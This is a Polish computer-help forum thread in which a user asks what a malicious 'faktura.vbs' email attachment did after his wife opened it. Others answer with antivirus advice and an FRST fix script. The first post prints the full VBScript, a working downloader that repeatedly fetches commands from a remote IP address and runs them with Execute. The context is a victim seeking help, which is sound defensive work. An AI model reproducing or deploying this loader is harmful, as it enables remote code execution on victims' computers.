Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Mail z załącznikiem faktura.vbs

gerber25 12 Wrz 2018 11:07 312 3
  • #1 12 Wrz 2018 11:07
    gerber25
    Poziom 1  

    Witam

    Dostałem dziś maila z załącznikiem faktura spakowanym rarem. w środku był plik faktura 1891285.vbs
    Niestety żona na niego kliknęła. Może ktoś mi pomóc i powiedzieć co ten plik zrobił na moim komputerze ?
    Podgląd tego pliku wygląda tak:


    dim sss, VieTnamMyArray, DiMatriSaurls, PipaAsadhttpsd, PlazaAsazzz
    PlazaAsazzz = "665550757"
    dim PanamaAurls, KariBiamSsate, BraVOsdate
    BraVOsdate = null


    Function CiPasASkip()
    On Error Resume Next
    CosmosAMessage(BraVOsdate)
    End Function

    Function MadrysodMase()
    dim noosexx
    noosexx = 0
    noosexx = FormatDateTime(Now, vbLongTime)
    MadrysodMase(noosexx)
    End Function

    Function ProBlemsSloas()
    On Error Resume Next
    PanamaAurls = "xxxxxxx64.110.25.154/api.php?faxid=345011535&opt="
    ProBlemsSloas(PanamaAurls)
    End Function


    Function ProBlemsSloas2()
    Dim ZapErselsd
    ZapErselsd = ProBlemsSloas()
    End Function


    Function CaribiAnsMinsa()
    ProBlemsSloas2()
    End Function

    Function CaroBkaTest()
    EvRaisAReset()
    End Function

    Function EvRaisAReset()
    PlazaAsazzz = CStr(PlazaAsazzz + 1)
    End Function

    Function ArmeSAFaxPc()
    On Error Resume Next
    CaribiAnsMinsa()
    While true
    WScript.Sleep 9000
    Call CiPasASkip()
    Wend
    End Function


    Function CosmosAMessage(lolosaddate)
    On Error Resume Next
    dim DereSreq
    Set DereSreq = createobject("Microsoft.XMLHTTP")
    DereSreq.Open "GET", lolosaddate, False
    DereSreq.Send
    WScript.Sleep 150
    VieTnamMyArray = Array(00, 22,43, 34, 2341, DereSreq.responseText)
    PropisiaAFAxdA()
    End Function

    Function SeNicazTest()
    BraVOsdate = ""
    BraVOsdate =+ PanamaAurls + PlazaAsazzz + "&" + "sfree"
    End Function

    Function BlincEsTest()
    SeNicazTest()
    End Function

    Function Hello()
    BlincEsTest()
    Execute "" + VieTnamMyArray(5) + ""
    End Function

    Function PropisiaAFAxdA()
    On Error Resume Next
    Set PipaAsadhttpsd = CreateObject("Microsoft.XMLHTTP")
    PipaAsadhttpsd.Open "GET", "xxxxxxx w w w .dencedence.denceasdq/12/3232", False
    PipaAsadhttpsd.Send

    If (PipaAsadhttpsd.Status = 200) Then
    MadrysodMase()
    Else

    Hello()

    CaroBkaTest()
    End If


    End Function


    Call ArmeSAFaxPc()




    W adresach celowo wstawiłem xxxx zamiast h t t p : / / bo nie mogłem wstawić posta z linkami

    0 3
  • Pomocny post
    #2 12 Wrz 2018 11:28
    Kolobos
    Spec od komputerów

    Zapewne nic, adres 64.110.25.154 nie wyglada na dzialajacy.

    0
  • Pomocny post
    #3 12 Wrz 2018 11:33
    krzysztof212
    Poziom 18  

    Witam.
    Z mojej strony poleciłbym abyś.
    Przeskanował komputer antywirusem, oraz użyj adwcleaner.
    Lepiej będzie jak zamieścisz w załączniku logi z FRST (Frst.txt oraz Addition.txt):
    http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/
    Tym bardziej, ze napisałeś w dziale w którym te logi są wymagane.

    0
  • #4 12 Wrz 2018 22:59
    RADU23
    Moderator - Komputery Serwis

    Otwórz notatnik i wklej zawartość:

    Cytat:
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKU\S-1-5-21-218629562-931979736-4130541716-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKU\S-1-5-21-218629562-931979736-4130541716-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://dell17win10.msn.com/?pc=DCTE
    SearchScopes: HKU\S-1-5-21-218629562-931979736-4130541716-1001 -> DefaultScope {7ACE928C-8CDD-48E1-8FCF-34544B2B6B00} URL =
    SearchScopes: HKU\S-1-5-21-218629562-931979736-4130541716-1001 -> {7ACE928C-8CDD-48E1-8FCF-34544B2B6B00} URL =
    FF HKLM\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSKHKLM => nie znaleziono
    CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
    U3 mfeaack01; Brak ImagePath
    U3 mfeavfk01; Brak ImagePath
    U3 mfehidk01; Brak ImagePath
    U3 mfencbdc01; Brak ImagePath
    ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku
    AlternateDataStreams: C:\Users\gerbe\OneDrive\Dokumenty\Niestandardowe szablony pakietu Office:${3D0CE612-FDEE-43f7-8ACA-957BEC0CCBA0}.Metadata [194]


    Plik zapisz pod nazwą fixlist.txt i umieść w folderze, gdzie masz FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.

    0